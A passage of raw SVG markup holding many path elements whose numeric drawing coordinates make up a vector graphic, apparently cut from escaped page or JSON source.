d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path 